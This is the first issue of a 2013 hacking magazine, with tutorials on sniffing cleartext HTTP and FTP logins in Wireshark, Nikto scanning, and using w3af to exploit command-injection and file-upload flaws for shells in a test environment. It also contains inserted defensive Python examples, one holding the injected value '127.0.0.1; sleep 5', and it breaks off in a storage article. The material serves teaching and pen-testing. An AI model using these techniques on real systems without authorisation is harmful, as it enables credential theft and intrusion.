
24th of January 2013

01/2012
1



Dear Readers,

After a long period of preparation we can proudly present the first Hack Insight issue. We decided to start it with Hacking Passwords because it is the base and first step for every IT security expert who is developing his hacking skills.

Two articles have been prepared by Mr. Vikas Kumar, who is an experienced ethical hacker. He describes in detail how to use Wireshark, Nikto and w3af. His research will help us understand how to sniff network traffic and use the best-known network protocol analyzer, Wireshark. The second article concerns hacking methods: Mr. Kumar presents how a keylogger works and how to create your own phishing page. You should definitely check this section out and think of the danger during daily computer usage.

The third article, written by Mr. Miroslav Ludvik and Mr. Radek Pilar, refers to Content Addressed Storage. In this issue we will see an introduction to secure data archiving. In the second issue, as Miroslav promised, he will present content about the first vendor technology; you definitely cannot miss this article.

This first publication would not have been possible without our magazine's friends, who spent a lot of their working time taking care of this issue. Special thanks to Ms. Sheryl Checkman, Mr. Timothy Coleman and Mr. Ty Donaldson. We are grateful that, thanks to your professional advice, attention to grammatical correctness and creation of the creative cover and essential images, we can now read this magazine.

Enjoy the hacking!
Hack Insight Team

[Hack]in(Sight)
Editorial Section:
Authors: Vikas Kumar, Miroslav Ludvik, Radek Pilar.
Proof-reading: Timothy Coleman, Nina Takahashi, Agata Brzozowska.
DTP: Sheryl Checkman, Ty Donaldson.
Publisher: Hack Insight Press Paweł Płocki
www.hackinsight.org
Editor in Chief: Paweł Płocki
p.pawel724@gmail.com




All trademarks presented in the magazine were used only for informative purposes.
www.hackinsight.org

Table Of Content

Page 6: Advanced Usage of Wireshark, Nikto and W3af.
Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Page 24: CAS - introduction
Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

Page 27: Data Stealing. Data Theft Prevention. Phishing.
Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would be taken as a crime in the eyes of the law. It is irrelevant whether you later used this data for misdeeds or not; what counts is that data that is not yours has been accessed without prior permission of its authorized user, who may also be its creator.
Advanced Usage of Wireshark, Nikto and W3af.
I. Wireshark:
Wireshark is the world's foremost network
protocol analyzer. It lets you capture and
interactively browse the traffic running on a
computer network. It is the de facto (and often
de jure) standard across many industries and
educational institutions.
Wireshark development thrives thanks to the
contributions of networking experts across the
globe. It is the continuation of a project that
started in 1998.
Figure 1.image of Wireshark with logo
Wireshark, formerly known as Ethereal, is one of
the most powerful tools in a network security
analyst's toolkit. As a network packet analyzer,
Wireshark can peer inside the network and
examine the details of traffic at a variety of levels,
ranging from connection-level information to the
bits comprising a single packet. This flexibility and
depth of inspection allows the valuable tool to
analyze security events and troubleshoot network
security device issues.
The Role of A Network Protocol Analyzer
Network protocol analyzers like Wireshark let us look at the behavior of network protocols. This can be useful for three main reasons:
1. Observing the network traffic generated
by protocols, services, applications etc,
helps us gain a better understanding of
how these various things work.
2. The ability to observe exactly what is
happening over a network can also often
help us gain a better understanding of a
problem we are troubleshooting.
3. Finally the ability to monitor network
traffic can help us identify threats to or
breaches of network security.
How to sniff network traffic and why sniff the
network?
The phrase "sniff the network" may conjure
Orwellian visions of a Big Brother network
administrator reading people's private email
messages. Before anyone uses Wireshark, an
organization should ensure that it has a clearly
defined privacy policy that spells out the rights of
individuals using its network, grants permission to
sniff traffic for security and troubleshooting
issues, and states the organization's policy
requirements for obtaining, analyzing and
retaining network traffic dumps. Anyone who
uses a tool like Wireshark without first obtaining
the necessary permissions may quickly find
themselves in hot water legally.
However, as a security professional, there are two important reasons to sniff network traffic. First, peering into the details of packets can prove invaluable when dissecting a network attack and designing countermeasures. For example, if a denial of service occurs, Wireshark can be used to identify the specific type of attack, and the analyst can then craft upstream firewall rules that block the unwanted traffic. The second major use of Wireshark is to troubleshoot security devices. Specifically, I regularly use it to troubleshoot firewall rules. If systems running Wireshark are connected to either side of a firewall, it's easy to see which packets successfully traverse the device and identify whether the firewall is the cause of connectivity problems.
That being said, it's important to remember that
Wireshark can be used for good or for evil, as is
the case with many security analyzers. In the
hands of a network or security administrator it's a
valuable troubleshooting tool. In the hands of
someone with questionable ethics, however, it's
a powerful eavesdropping tool that enables
someone to view every packet that traverses the
network.
Downloading & Installing Wireshark

If you don't already have Wireshark installed on your computer, you can download it from the Wireshark website at http://www.wireshark.org.

Figure 2. Available Interfaces
Figure 3. Interface Selection for capturing data packets.

Security Note: It is best practice to download software only from the official site of the developer. There are many other sites which offer Wireshark downloads; my advice is to avoid them, as you can't know whether the software you are downloading has been altered in a malicious way by the third-party site.

The installation is straightforward, and most people should be able to run the installer and simply click Next through the whole process.

Running a simple packet capture

Once Wireshark is installed, start it up and you'll be presented with a blank screen in which you select the interface on which you want to capture data packets, as shown below:



Click the Start button next to the name of the interface on which you wish to capture traffic, and immediately you will see Wireshark filling up with traffic, as shown in the picture below.
Figure 4. Wireshark traffic
Interpreting the results with Wireshark color
codes
Each line in the top pane of the Wireshark
window corresponds to a single packet seen on
the network. The default display shows the time
of the packet (relative to the initiation of the
capture), the source and destination IP addresses,
the protocol used and some information about
the packet. You can drill down and obtain more
information by clicking on a row. This causes the
bottom two window panes to fill with
information.
The middle pane contains drill-down details on the packet selected in the top frame. The "+" icons reveal varying levels of detail about each layer of information contained within the packet. In the example above, I've selected a DNS response packet. I've expanded the DNS response (application layer) section of the packet to show that the original was requesting a DNS resolution for www.cnn.com, and this response is informing us that the available IP addresses include 64.236.91.21. The bottom window pane shows the contents of the packet in both hexadecimal and ASCII representations.
Wireshark color codes
Color is your friend when analyzing packets with
Wireshark. Notice in the example above that each
row is color-coded. The darker blue rows
correspond to DNS traffic, the lighter blue rows
are UDP SNMP traffic, and the green rows signify
HTTP traffic. Wireshark includes a complex color-
coding scheme (which you can customize). The
default settings appear below:
Figure 5. Wireshark color coding

Wireshark is now capturing data packets, so let's test whether it works: ping any system on the network and Wireshark will capture the ICMP data packets.
Figure 6. Pinging from IP 192.168.152.130 to target system IP 192.168.152.128
Figure 7. ICMP data packet filtration with echo request & reply

Wireshark is still capturing data packets, so let's test it again: suppose I log in to www.jammuclubjammu.com.




Figure 8. Putting credentials in login account

Filter data packets. For this tutorial I have used HTTP, as shown below.
NOTE: there are many protocols you can use to filter data packets (e.g. FTP).
Figure 9. Finding HTTP data packets through filtration.

Now look for the POST request and select it.
Right-click it, or go to the Analyze menu, and then select Follow TCP Stream.
Figure 10. Finding HTTP data packets through filtration.

You should now see this window; just scroll down until you see the username and password. As you can see, I managed to capture my username and password.
Figure 11. TCP Stream window will show credentials
FTP Data Packet Capturing with Login Credentials
Now we are going to capture data packets of the FTP protocol. For that we use a command prompt to log in to the FTP account of the jammuclubjammu.com web server.
Figure 12. FTP Login with cmd.

We have entered the credentials and, side by side, our Wireshark is capturing all the data packets.
Figure 13. Login into FTP account with credentials.


Now we will resolve the data packets of the FTP protocol. First of all we filter all FTP data packets, as given below:
Figure 14. FTP data packet filtration.

Now we resolve these data packets: right-click on an FTP data packet and click Follow TCP Stream.
Figure 15. FTP data packet resolved and credentials in plain text.
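The two Follow TCP Stream views above show why HTTP form logins and FTP hand over credentials in the clear. As an added example (not part of the article), the script below runs the same check over reconstructed client-to-server streams so an analyst can alert on cleartext credential submissions without re-exposing the secret; the streams, hostnames and field-name lists are constructed.

```python
import re
from urllib.parse import parse_qs

# Field names that usually carry a login secret or account name (assumed lists).
PASSWORD_FIELDS = {"password", "passwd", "pass", "pwd"}
USER_FIELDS = {"username", "user", "login", "email", "uname"}


def _redact(secret):
    """Alerts carry only the length, never the captured secret itself."""
    return "<redacted:%d chars>" % len(secret)


def find_http_post_credentials(stream):
    """Scan a client-to-server HTTP stream for form POSTs carrying a password field."""
    alerts = []
    text = stream.decode("latin-1")           # byte-preserving, never raises
    for request in re.split(r"(?=^POST )", text, flags=re.M):
        if not request.startswith("POST "):
            continue
        head, _, body = request.partition("\r\n\r\n")   # headers / body split
        ctype = re.search(r"^Content-Type:\s*(\S+)", head, re.M | re.I)
        if not ctype or "x-www-form-urlencoded" not in ctype.group(1).lower():
            continue
        fields = parse_qs(body.strip(), keep_blank_values=True)
        pw_key = next((k for k in fields if k.lower() in PASSWORD_FIELDS), None)
        if pw_key is None:
            continue
        user_key = next((k for k in fields if k.lower() in USER_FIELDS), None)
        host = re.search(r"^Host:\s*(\S+)", head, re.M | re.I)
        alerts.append({
            "proto": "http",
            "host": host.group(1) if host else "?",
            "path": request.split(" ", 2)[1],
            "user": fields[user_key][0] if user_key else None,
            "password": _redact(fields[pw_key][0]),
        })
    return alerts


def find_ftp_credentials(stream):
    """Scan a client-to-server FTP control stream for USER/PASS pairs."""
    alerts, user = [], None
    for line in stream.decode("latin-1").splitlines():
        cmd, _, arg = line.strip().partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS":
            alerts.append({"proto": "ftp", "user": user, "password": _redact(arg)})
            user = None
    return alerts


# Constructed sample streams (not real captures): a browser login over plain HTTP
# and a command-line FTP login, the two cases shown in the figures above.
HTTP_STREAM = (
    b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
    b"POST /login.php HTTP/1.1\r\nHost: www.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 33\r\n\r\n"
    b"username=alice&password=s3cret%21\r\n"
)
FTP_STREAM = b"USER ftpadmin\r\nPASS hunter2\r\nSYST\r\nPWD\r\n"

if __name__ == "__main__":
    for alert in find_http_post_credentials(HTTP_STREAM) + find_ftp_credentials(FTP_STREAM):
        print("cleartext credential:", alert)
```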
Filtering Packets
If you're trying to inspect something specific, such as the traffic a program sends when phoning home, it helps to close down all other applications using the network so you can narrow down the traffic. Still, you'll likely have a large number of packets to sift through. That's where Wireshark's filters come in.
The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking Apply (or pressing Enter). For example, type ip.src == 192.168.152.130 and you'll see only data packets with source IP 192.168.152.130. When you start typing, Wireshark will help you autocomplete your filter.
Figure 16. Data packet filtration of ip.src == 192.168.152.130

Next, filter on DNS:
Figure 17. Data Packet filtration of DNS


Inspecting Packets
Click a packet to select it and you can dig down to view its details.

Figure 18. Data Packet Inspecting

You can also create filters from here: just right-click one of the details and use the Apply as Filter submenu to create a filter based on it.

Figure 19. Apply as Filtration.
Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do
with it. Professionals use it to debug network protocol implementations, examine security problems and
inspect network protocol internals.
II. Nikto:
Introduction
"Nikto is an open source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers."
The good thing about Nikto is that it is easy to use and scans quickly. Nikto is coded in Perl and was written by Chris Sullo and David Lodge. Not all checks indicate a big security problem, but most do, such as XSS (Cross Site Scripting) vulnerabilities, phpMyAdmin logins, etc. Nikto alerts you and gives security tips in order to protect your website from various attacks.
Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).
Not every check is a security problem, though
most are. There are some items that are "info
only" type checks that look for things that
may not have a security flaw, but the
webmaster or security engineer may not
know are present on the server. These items
are usually marked appropriately in the
information printed. There are also some
checks for unknown items which have been
seen scanned for in log files.
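Because Nikto is, as noted above, fairly obvious in log files, a defender can spot a scan from the web server's access log. The detector below is an added example (not Nikto's or the author's code) run over constructed Apache combined-format log lines; the 404 threshold and time window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format (assumed; adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_scanner(lines, max_404=10, window_s=60):
    """Flag a client once per reason: a User-Agent that names the scanner, or a
    burst of at least max_404 '404 Not Found' responses within window_s seconds
    (the footprint of a tool probing thousands of known paths)."""
    alerts, flagged = [], set()
    window_start, count_404 = {}, defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if "nikto" in rec["ua"].lower() and (ip, "ua") not in flagged:
            flagged.add((ip, "ua"))
            alerts.append({"ip": ip, "reason": "nikto-user-agent", "at": rec["ts"]})
        if rec["status"] == 404:
            start = window_start.get(ip)
            if start is None or (rec["ts"] - start).total_seconds() > window_s:
                window_start[ip], count_404[ip] = rec["ts"], 0   # open a new window
            count_404[ip] += 1
            if count_404[ip] >= max_404 and (ip, "404-burst") not in flagged:
                flagged.add((ip, "404-burst"))
                alerts.append({"ip": ip, "reason": "404-burst", "at": rec["ts"],
                               "count": count_404[ip]})
    return alerts


def sample_log():
    """Constructed log lines: one ordinary visitor and one scanner whose User-Agent
    is modelled on Nikto's default (which names the tool) probing a list of paths."""
    fmt = '%s - - [24/Jan/2013:10:00:%02d +0000] "GET %s HTTP/1.1" %d 512 "-" "%s"'
    browser = "Mozilla/5.0 (X11; Linux x86_64)"
    lines = [fmt % ("192.0.2.10", 0, "/index.html", 200, browser),
             fmt % ("192.0.2.10", 1, "/missing.css", 404, browser)]
    probes = ["/cgi-bin/test-cgi", "/admin/", "/phpmyadmin/", "/server-status",
              "/backup/", "/.htpasswd", "/test.php", "/old/", "/tmp/", "/config.php", "/db/"]
    for i, path in enumerate(probes):
        lines.append(fmt % ("198.51.100.7", 2 + i, path, 404,
                            "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:%06d)" % i))
    return lines


if __name__ == "__main__":
    for alert in detect_scanner(sample_log()):
        print(alert)
```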
So if you are using Backtrack to practice pen-testing, then you needn't worry about installing Nikto, as it is already there in Backtrack (it's there even in Backtrack 4). But if you aren't using Backtrack, then you can download Nikto from the website

http://www.cirt.net/nikto2

Make sure you have Perl installed, because Nikto is a Perl script.
You can run Nikto in two ways:
1. Go to Applications > Backtrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerabilities Scanner > Nikto
2. cd /pentest/web/nikto/
Simply:
root@bt:~# cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -H
Figure 20. Nikto Options of help

Figure 21. Nikto Options of help

root@bt:/pentest/web/nikto# ./nikto.pl -host 10.x.x.52 -output kioptrix_80.txt

If we give the command ./nikto.pl -Help or perl nikto.pl -Help, then we get details of all options. We are simply going to scan a target website, because we are pentesting it. So easy:





Figure 22. Nikto scanning target website
Figure 23. Nikto Scanning result.

Now you will get an output file in txt format, which you can open for reading with:
root@bt:/pentest/web/nikto# cat kioptrix_80.txt
Figure 24. Nikto output file.

In order to run a simple vulnerability scan against a target you just have to specify a host address
along with a port number.

For example, perl nikto.pl -h 10.10.15.27 -p 32333
Figure 25. Nikto scanning a web server based on port.

In the above command:

-h switch implies host address.
-p switch implies port number.

The above command runs a vulnerability scan against the host 10.10.15.27. But since we specified the port number as 32333, Nikto scans that particular port only. Now if you want the scan to include multiple ports, you have to specify a port range:

perl nikto.pl -h 10.10.15.27 -p 1024-10000

What if you don't specify any port?

perl nikto.pl -h 10.10.15.27
Figure 25. Nikto scanning a web server without specifying port

In this case Nikto just scans port 80.
Are these the only switches that Nikto has to offer (i.e. -h and -p)? No, it offers a wide variety of switches. Just type perl nikto.pl to see the options Nikto offers.
Figure 26. Nikto scanning options for scanning
target website to use.
III. W3af:
Security is a key point for every effective business. Whether you are running your own website or your job is to manage the web application for your company, you have to do a little penetration testing to check the security of the web application. Nowadays exploits are available and updated on a daily basis for different web application services.

While doing penetration testing, a pen tester must consider these exploits for different vulnerabilities. Finding vulnerabilities is not enough: a pen-tester must also check the exploits that are publicly available for different services.

w3af (Web Application audit and attack
framework) is a framework for auditing and
exploitation of web applications. In this series
of articles we will be looking at almost all the
features that w3af has to offer and discuss how
to use them for Web application Penetration
testing. In the first part of this series we will be
working with w3af console and getting ourselves
familiar with the commands. We will also be
looking at the different types of plugins that w3af
has to offer and discuss how to use them for
optimal performance.
W3af stands for Web Application Attack and Audit Framework. I have heard some say that it is the Metasploit for web applications. W3af is basically a free, open source web application scanner. W3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, brute force, mangle and a few others. The code is well commented and written in Python, so writing your own exploits and plugins should be trivial.
Some of the major features of w3af are:
1. It has plugins that communicate with each other. For example, the discovery plugin in w3af looks for different URLs to test for vulnerabilities and passes them on to the audit plugin, which then uses these URLs to search for vulnerabilities.
2. It removes some of the headaches involved in manual web application testing through its Fuzzy and Manual request generator feature. It can also be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be performed using variable parameters.
3. It also has features to exploit the vulnerabilities that it finds.
Figure 27. W3af (Web Application Attack and
Audit Framework)
The first step is to give the URL to w3af and scan it for XSS vulnerabilities. Open up the w3af GUI. Once it is open, on the left hand side, we can see an option to choose from various profiles.
Figure 28. W3af profile selection.

We can choose any profile from the list depending on our need, as well as the time available. These profiles already have configurations to use some specific plugins for a particular task. For example, if we look at the profile OWASP_TOP10, we will see that it uses several of the Audit, Grep and Discovery plugins to perform its tasks.


Figure 29. W3af Plug-ins selection for scanning
target url
For the time being, we are going to use an Empty
profile as we just want to check a single url for an
XSS vulnerability. Note that this is usually not the
way in which we will use the w3af framework. In
a real world environment, we will choose some
specific discovery plugins to find different urls to
check for injections, auth plugins to automatically
log in to forms and crawl ahead, grep plugins to
look for interesting information in the response,
and audit plugins to scan for vulnerabilities in the
found injection points.
Type in the url in the target field and choose
the xss plugin from the audit plugins.
Figure 30. URL scanning

Once this is done, click on Start. This will start the scan on the given URL. As we can see from the output, it found an XSS vulnerability.






Figure 31. W3af scanning result
If you are interested in knowing what actually happened, go to the Results tab. Click on xss on the left side. On the right side, you can see a description of how the vulnerability was found. On the bottom right, you can also see the request and response which led to the identification of the vulnerability. It is a very good practice to look at the requests and responses sent by w3af, as this lets us know what's going on under the hood.
Figure 32. W3af Vulnerability description

So basically what happened was that w3af sent JavaScript strings to every parameter in the URL, and then checked for those strings in the response. In the case of stored XSS, w3af takes a note of the injected string and makes a request again to the URL looking for that string. If it finds that string, then a stored XSS has been identified.
Let's now use an OS commanding vulnerability to obtain a shell on the system. From the OS commanding section in the w3af test environment, choose a URL and give it as target to w3af. Under the audit plugins section, check the OS commanding plugin.




Figure 33. W3af OS Command for obtaining
shell of target URL.

Figure 34. OS Command vulnerability output

Once this is done, click on start to launch the
vulnerability scan. As we can see from the output,
w3af identified an OS commanding vulnerability.

w3af supports detection of both simple and blind OS commanding vulnerabilities. In simple OS commanding, it sends a simple command to every parameter and then looks for a response to that command in the output. In the case of blind OS commanding, in which the response is not present in the output, it uses time delays to identify whether a vulnerability is present. For example, if it sends a command which delays the response for some seconds, and we note a delay in the output, we can say that a blind OS commanding vulnerability is present. Again, in the results section, we can see the request and the response which led to identification of the vulnerability.
Figure 35. Vulnerability identification
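For the OS commanding vulnerability w3af detects above, here is the vulnerable handler pattern beside its hardened form, as an added example that is not w3af's code; the "ping a host" handler and the hostname policy are assumptions.

```python
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 hostname (assumed validation policy): dot-separated labels of letters,
# digits and inner hyphens, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def build_ping_vulnerable(host):
    """The string a vulnerable handler hands to a shell (shell=True). The user
    value is concatenated unchecked, so a shell separator inside it starts a
    second command, which is exactly what w3af's probe relies on."""
    return "ping -c 1 " + host


def shell_command_count(cmdline):
    """How many separate commands a POSIX shell would run for this string.
    Used only to show the effect; backticks and $( ) are not counted here."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in (";", "|", "||", "&&", "&"))


def is_valid_host(host):
    """Allowlist: an IP literal or a syntactically valid hostname, nothing else
    (spaces, ';', '|', '$', quotes and so on all fail)."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None


def validate_host(host):
    if not is_valid_host(host):
        raise ValueError("invalid host: %r" % host)
    return host


def build_ping_hardened(host):
    """argv list for subprocess without a shell: even if validation were
    skipped, the whole value would reach ping as one literal argument."""
    return ["ping", "-c", "1", validate_host(host)]


def ping_hardened(host, timeout=5):
    """Run the hardened form; returns ping's exit status (0 = host answered)."""
    proc = subprocess.run(build_ping_hardened(host), capture_output=True, timeout=timeout)
    return proc.returncode


if __name__ == "__main__":
    injected = "127.0.0.1; sleep 5"   # constructed input of the kind a scanner sends
    print(shell_command_count(build_ping_vulnerable(injected)), "commands for the shell")
    print("hardened accepts it:", is_valid_host(injected))
```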
w3af also allows us to exploit vulnerabilities. If we
go under the Exploit section, we can see the
identified vulnerability in
the Vulnerabilities section. If we click on it, we
can see that osCommandingShell in the Exploits
section turns black. This is an indication that the
vulnerability can be exploited using the
osCommandingShell plugin in w3af. Right click on
osCommandingShell and click on Exploit ALL
vulns.

Figure 36. W3af vulnerability exploitation.
Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We
can see the list of shells on the right side. Note that it is not possible to get a shell in case of every
vulnerability.
Just double click on the shell and you are all set and ready to go.
Figure 37. Shell execution
Similarly, let's use a file upload vulnerability to get a shell. Give the vulnerable URL as a target to w3af. Make sure the fileUpload plugin is checked in the audit plugins list.

Figure 38. FileUpload Plug-ins list.

Also make sure to check the extensions option in the fileUpload plugin. Since in some cases the web application allows only some specific extensions, it is favorable to add those extensions to the list as well.

Figure 39. Specifying extensions for web application

Click on Start. As we can see from the output, w3af identified a file Upload vulnerability.

Figure 40. FileUpload vulnerability identification.

Click on the Results tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this by sending the file object in the uploadedfile parameter. It then looked for this file in common directories like uploads etc. If the file is found, then it can be said that an Insecure File Upload vulnerability exists. However, this is not always the case, as most web applications filter files based on their extension. To bypass this, w3af has templates for some of the most common file extensions. These templates have valid extensions but have a section that can be replaced with scripting code. The figure below shows the files with different extensions present in w3af.

Figure 41. FileUpload templates

If we open up any of these files with Kate, we can see the content inside it. As we can see from the figure below, the file template.png has a string of A's in its comment section. This string can be replaced by scripting code such as PHP.

Figure 42. String replacement.
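To counter the polyglot templates just described (a valid image extension and header, with script code in the comment section), an upload check has to look past the extension. The validator below is an added example, not w3af's code; the PNG samples, the marker list and the upload directory are constructed.

```python
import os
import secrets
import struct
import zlib

# Extension allowlist with the magic bytes each one must start with (assumed policy).
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
# Markers that should never appear inside an image, compressed metadata included.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%@")
UPLOAD_DIR = "/var/app-uploads"   # assumed: outside the web root, never executed


def png_chunks(data):
    """Yield (type, payload) for every chunk after the signature, verifying
    lengths and CRCs so a malformed file is rejected instead of half-parsed."""
    pos = 8
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk")
        payload = data[pos + 8:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, payload
        pos = end + 4


def _has_marker(blob):
    low = blob.lower()
    return any(m in low for m in SCRIPT_MARKERS)


def validate_upload(filename, data):
    """Return (ok, reason). Extension and magic bytes first, then a marker scan
    of the raw bytes, then the PNG chunks, decompressing zTXt so a marker hidden
    in compressed metadata is seen as well."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if _has_marker(data):
        return False, "script marker in file body"
    if ext == "png":
        try:
            for ctype, payload in png_chunks(data):
                if ctype == b"zTXt":           # keyword, NUL, method byte, deflate data
                    _, _, rest = payload.partition(b"\0")
                    try:
                        text = zlib.decompress(rest[1:])
                    except zlib.error:
                        return False, "corrupt zTXt chunk"
                    if _has_marker(text):
                        return False, "script marker in compressed metadata"
        except ValueError as e:
            return False, str(e)
    return True, "ok"


def store_upload(filename, data):
    """Validate, then return the path to write: random name, client name unused."""
    ok, reason = validate_upload(filename, data)
    if not ok:
        raise ValueError(reason)
    return os.path.join(UPLOAD_DIR, secrets.token_hex(8) + "." + filename.rsplit(".", 1)[-1].lower())


def _chunk(ctype, payload):
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF))


# Constructed 1x1 PNG skeletons: a clean one, and two "templates" whose comment
# carries a placeholder script tag, once as plain text and once zlib-compressed.
_IHDR = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
_SIG = ALLOWED["png"]
CLEAN_PNG = _SIG + _IHDR + _chunk(b"tEXt", b"Comment\0" + b"A" * 32) + _chunk(b"IEND", b"")
PLAIN_POLYGLOT = _SIG + _IHDR + _chunk(b"tEXt", b"Comment\0<?php /* placeholder */ ?>") + _chunk(b"IEND", b"")
ZTXT_POLYGLOT = (_SIG + _IHDR
                 + _chunk(b"zTXt", b"Comment\0\0" + zlib.compress(b"<?php /* placeholder */ ?>" + b"A" * 200))
                 + _chunk(b"IEND", b""))

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_PNG), ("plain", PLAIN_POLYGLOT), ("ztxt", ZTXT_POLYGLOT)]:
        print(name, validate_upload("template.png", blob))
```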

With all of these basics out of the way, let's exploit this vulnerability using the fileUploadShell plugin. You can also set the configuration of these plugins by right-clicking on them and clicking on Configure the plugin.
As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the
target machine.

Figure 43. Vulnerability exploitation.

Similarly you can perform tests for many other exploits like Local File Inclusion, Remote File Inclusion, SQL
Injection etc.










About the author

VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR was born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his group hackers4u on Facebook in the year 2010, and in two years he has hit the World Wide Web with good computer ethical hacking articles; he is going to launch a website on Cyber Security & Ethical Hacking and is working with the anti-hacking community I-hackers4u. The 22 year old has the capability to compete with the best people in the business of so-called Ethical Hacking.

Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran, etc.
www.cyber-hunt.com

Blog: www.cyber-hunt2012.blogspot.com
LinkedIn Profile: https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro
Facebook: https://www.facebook.com/hackers4u
BackTrack Fan Club Page: https://www.facebook.com/pages/Cyber-Hunt-BackTrack-Fan-Club/395372283859684?ref=tn_tnmn
Facebook Page: https://www.facebook.com/vikas7852?ref=tn_tnmn
Email ID: vikas_ind2008@yahoo.in, cyberhunt2012@gmail.com
CAS introduction

Abstract:
Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS
(Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then,
there will be a few articles about existing solutions and finally, their comparison.

Typical filesystems use name and path to uniquely identify a stored object (which can be a file, directory, symlink, etc.). This approach has a few advantages, but also a few disadvantages that CAS systems aim to fix. CAS, as its name implies, identifies the object by its content. Of course, it wouldn't be practically feasible to use the whole content of the object; in that case, storing the file would be pointless. Instead, CAS systems use a cryptographic hash of the content. So, if we want to access the file with content "Balance for the year 2012", instead of the file:
/home/accountant/docs/balance2012.doc

or on Windows:
C:\Users\Accountant\Documents\balance2012.doc

we access the object identified by the string:
cd52089ea948bd42fece0ebba0c91b5ae68169e4

which is, in this example, the SHA-1 hash of its content. Because with that approach you'd lose some information (filename, author, creation date), the CAS system attaches metadata to objects.
The first CAS system ever was introduced in 2003 by the US company EMC under the name Centera, but it was immediately followed by similar products from other vendors like HP, Hitachi, Oracle/Sun, Dell and others. Today, CAS is used as a de-facto standard for long-term data archiving. CAS-based solutions have several advantages. Since the system works with file hashes instead of filenames, it is much more difficult to tamper with data (even from the sysadmin's perspective): it is really easy to save a different file with the same name, but really difficult to save a different file with the same hash. On the other side, two files with the same contents will have the same hash; therefore, only one copy will be stored in the system. This effectively supersedes file-level deduplication: the non-existence of multiple copies of the same file is implied by the basic principles of the system itself.

